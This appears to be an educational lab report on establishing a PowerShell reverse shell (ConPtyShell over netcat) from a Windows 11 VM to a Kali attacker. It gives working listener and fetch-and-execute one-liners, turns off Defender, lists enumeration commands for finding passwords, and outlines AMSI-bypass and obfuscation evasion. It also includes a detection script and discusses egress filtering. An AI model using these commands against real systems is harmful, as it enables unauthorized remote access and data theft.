Author: MRMCyber
Date: February 23, 2026
Environment: Isolated Virtual Lab (Kali Linux & Windows 11)
Classification: Educational / Internal Research Only
—
1. Executive Summary
The objective of this technical lab is to analyze the mechanics of a Remote Access Trojan (RAT) by establishing a functional Reverse Shell between a Windows-based target and a Kali Linux attacker node. This report documents the network configuration required for peer-to-peer communication, the impact of Endpoint Detection and Response (EDR), specifically Windows Defender, and the subsequent post-exploitation phase involving filesystem enumeration and data exfiltration.
Key Learning Objectives:
- Infrastructure: Configuring Bridged Networking to simulate a Local Area Network (LAN) attack vector.
- Payload Delivery: Executing memory-resident PowerShell payloads to minimize disk footprint.
- Defense Analysis: Observing AMSI (Antimalware Scan Interface) behavior and signature-based detection.
- Command & Control (C2): Transitioning from a basic TCP stream to a fully interactive pseudo-terminal (ConPTY).
—
2. Technical Architecture
To ensure a successful handshake, the environment must bypass the isolation of standard NAT configurations.
2.1 Networking: The Bridged Adapter
By default, Virtual Machines use Network Address Translation (NAT), placing the guest behind a virtual gateway. In a NAT environment, other machines on the LAN (including the Windows target) cannot initiate a connection to the VM, which breaks the reverse connection.
Configuration Steps:
- Hypervisor Settings: Modify the Network Adapter to Bridged Mode.
- Interface Selection: Bind the VM to the physical network interface (e.g., eth0 or wlan0).
- IP Verification: Use ip a on Kali to confirm an IP within the host’s subnet (e.g., 192.168.1.0/24).
Note: In this setup, the Kali VM acts as a true peer on the network, allowing it to receive the outbound connection initiated by the Windows target.
—
3. Attack Vector Analysis
Bind Shell vs. Reverse Shell
Standard firewalls block Inbound connections (Bind Shells) by default. However, Outbound traffic (Reverse Shells) is frequently permitted to allow for web browsing and system updates.
| Feature | Bind Shell | Reverse Shell |
|---|---|---|
| Connection Origin | Attacker → Target | Target → Attacker |
| Firewall Status | Usually Blocked (Inbound) | Usually Permitted (Outbound) |
| Stealth | Low (Opens a new port) | Higher (Blends with egress traffic) |
—
4. Exploitation Walkthrough
Phase 1: Establishing the Listener
We utilize netcat (nc) on the attacker machine to listen for the incoming connection. To blend in with legitimate traffic, we listen on a “common” port (e.g., 443/HTTPS) so the connection resembles encrypted web traffic.
```bash
# -l: Listen | -v: Verbose | -n: No DNS | -p: Port | -s: Source IP
nc -lvnp 443 -s [KALI_IP]
```
Phase 2: Interactive Shell Upgrade (ConPtyShell)
A standard Netcat shell is “dumb”—it lacks tab completion and breaks when Ctrl+C is pressed. We use ConPtyShell to transform the session into a fully functional Windows terminal.
Step A: Prepare Attacker Terminal
```bash
# Put the local terminal in raw mode, send its size first, then pipe keystrokes to the listener
stty raw -echo; (stty size; cat) | nc -lvnp 87 -s [KALI_IP]
```
Step B: Execute Target Payload
On the Windows host, we execute a “One-Liner” that downloads the script into memory (Invoke-WebRequest) and executes it (Invoke-Expression) without saving a file to the hard drive.
```powershell
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [KALI_IP] 87
```
—
5. Defensive Response & EDR Analysis
5.1 Detection Logic
Upon initial execution, Windows Defender will trigger an alert. This occurs due to:
- AMSI Interception: The script is scanned in memory before the IEX command completes.
- Static Signatures: The Invoke-ConPtyShell string is a known indicator of compromise (IOC).
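As an added example (not part of the original lab), the detection logic above expressed as code a defender could run over parsed telemetry: it flags the in-memory download cradle (a fetch primitive and IEX in one script block), the Invoke-ConPtyShell IOC string, and script hosts making outbound connections that an egress filter would block. The log records, hostnames and the 192.0.2.10 address are constructed; the 4104/Sysmon event shapes are assumed to have been parsed into plain fields already.

```python
import re

# Constructed sample telemetry (not from the lab): PowerShell ScriptBlock
# logging (Event ID 4104) text and Sysmon network-connection (Event ID 3)
# records, already parsed into fields the way a SIEM would present them.
SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Users -Recurse -Filter *.log",
    "IEX(IWR https://files.example/Invoke-ConPtyShell.ps1 -UseBasicParsing); "
    "Invoke-ConPtyShell 192.0.2.10 87",
    "Invoke-WebRequest https://updates.example/setup.msi -OutFile C:\\Temp\\setup.msi",
    "$c = New-Object Net.WebClient; Invoke-Expression $c.DownloadString('https://files.example/x.ps1')",
]
NET_EVENTS = [
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "dst_port": 87},
    {"image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "dst_port": 443},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "dst_port": 443},
]

# The two halves of a download cradle: something that fetches remote text and
# something that evaluates it. Both must appear in the same script block.
FETCH = re.compile(r"\b(IWR|Invoke-WebRequest|DownloadString|Net\.WebClient)\b", re.I)
EVAL = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
KNOWN_IOCS = ("Invoke-ConPtyShell",)   # string signature the report calls out
EGRESS_ALLOW = {80, 443}               # ports an egress-filtering policy would permit

def classify_script_block(text):
    """Return the reasons a 4104 script block deserves an alert (empty if none)."""
    reasons = []
    if FETCH.search(text) and EVAL.search(text):
        reasons.append("in-memory download cradle (fetch + IEX)")
    for ioc in KNOWN_IOCS:
        if ioc.lower() in text.lower():
            reasons.append(f"known IOC string: {ioc}")
    return reasons

def classify_net_event(ev):
    """Flag PowerShell hosts opening outbound TCP; apply the egress allowlist."""
    proc = ev["image"].rsplit("\\", 1)[-1].lower()
    if proc not in ("powershell.exe", "pwsh.exe"):
        return None
    if ev["dst_port"] not in EGRESS_ALLOW:
        return f"{proc} outbound to non-allowlisted port {ev['dst_port']} (blocked by egress filter)"
    return f"{proc} outbound on port {ev['dst_port']} (permitted but unusual for a script host)"

def run():
    """Collect every (record, reason) pair across both sample feeds."""
    findings = [(t, r) for t in SCRIPT_BLOCKS if (r := classify_script_block(t))]
    findings += [(e, r) for e in NET_EVENTS if (r := classify_net_event(e))]
    return findings

if __name__ == "__main__":
    for item, reason in run():
        print(reason, "<-", item)
```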
5.2 Controlled Bypass (Lab Setting)
To study post-exploitation, Real-Time Protection is temporarily disabled. This simulates a “successful” breach where an attacker has used an obfuscated dropper or an AMSI-bypass script.
With Real-Time Protection disabled, the PowerShell command executes without interruption. The ConPtyShell script is downloaded, loaded into memory, and the Windows host initiates an outbound TCP connection to the Kali listener. The connection is received on the Kali terminal and a fully interactive Windows shell prompt is returned.
Photo from PowerShell
Photo from Kali
—
6. Post-Exploitation & Enumeration
Once the shell is established, we perform Situational Awareness to identify high-value data.
Common Enumeration Commands
| Command | Intent |
|---|---|
| whoami | Identify current user privileges. |
| net user | List local accounts for potential lateral movement. |
| dir /s *.txt | Recursively search for sensitive text files (passwords, notes). |
| ipconfig /all | Map the internal network and DNS settings. |
—
7. Future Research: Evasion Techniques
To evolve this lab, future iterations will focus on Evasion rather than manual deactivation of defenses.
- AMSI Patching: Forcing the AMSI provider to return a CLEAN result regardless of the payload.
- Obfuscation: Using tools like Invoke-Obfuscation to change the script’s abstract syntax tree (AST).
- Living-off-the-Land (LotL): Utilizing signed Windows binaries (e.g., certutil, msiexec) to proxy the download.
—
8. Conclusion
This lab demonstrates that while modern EDR solutions provide robust protection against known public tools, the Reverse Shell remains a potent vector for maintaining access. Proper network segmentation and Egress Filtering (restricting outbound ports) are critical defenses against this type of adversary behavior.
—
Disclaimer: This documentation is for authorized educational purposes only. Unauthorized access to computer systems is a violation of federal and international law.